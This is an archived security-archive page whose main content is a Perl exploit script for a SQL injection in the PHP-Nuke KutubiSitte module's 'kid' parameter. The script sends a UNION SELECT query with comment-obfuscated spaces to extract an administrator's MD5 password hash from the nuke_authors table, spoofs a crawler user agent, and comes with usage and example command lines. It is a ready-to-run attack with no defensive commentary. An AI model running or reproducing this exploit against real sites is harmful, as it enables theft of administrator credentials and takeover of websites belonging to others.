Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Web :: PHP :: bx2264.htm

PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding



PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding
PHP-Nuke KutubiSitte "kid" SQL Injection exploit code adding



#!/usr/bin/perl =0D
use Getopt::Std;=0D
use LWP::UserAgent;=0D
=0D
sub usg{=0D
printf("=0D
=0D
=0D
   -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-=0D
   |  PHP-NUKE  KutubiSitte [kid]  =>  SQL Injection   |=0D
   -#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-#-=0D
  #######################################################=0D
  # Bug by Lovebug Exploit-Code by r080cy90r from RBT-4 #=0D
  #######################################################=0D
<-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->-<->->=0D
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#=0D
#:-------------------------------------------------------:#=0D
:#|                    USAGE:                           |#:=0D
:#| exploit.pl -h [Hostname] -p [Path] -U [User_Id]     |#:=0D
#:-------------------------------------------------------:#=0D
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#=0D
#:-------------------------------------------------------:#=0D
:#|                   EXAMPLE:                          |#:=0D
:#| exploit.pl -h http://site.com -p /php-nuke/ -U 1 |#:=0D 
#:-------------------------------------------------------:#=0D
#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#:#=0D
=0D
=0D
");=0D
}=0D
sub problem{=0D
    print "\n\n[~] SITO NON VULNERABILE [~]\n\n";=0D
    exit();=0D
}=0D
sub exploitation{=0D
    =0D
    $conn = LWP::UserAgent -> new;=0D
    $conn->agent('Checkbot/0.4 ');=0D
    $query_pwd = $host.$path."modules.php?name=KutubiSitte&h_op=hadisgoster&kid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2C0,aid,pwd,4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D".$user_id."%2F%2A";=0D
    $return_pwd = $conn->get($query_pwd) || problem();=0D
    $return_pwd->content() =~ /([0-9,a-f]{32})/ || problem();=0D
    print "\n \[~\] Admin Password(md5)=$user_id is: $1 \[~\]\n\n ";=0D
   }=0D
=0D
getopts(":h:p:U:",\%args);=0D
     $host = $args{h} if (defined $args{h});=0D
     $path = $args{p} if (defined $args{p});=0D
     $user_id= $args{U}if (defined $args{U});=0D
     =0D
     if (!defined $args{h} || !defined $args{p} || !defined $args{U}){=0D
        usg();=0D
     }=0D
     else{=0D
        exploitation();=0D
     }


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH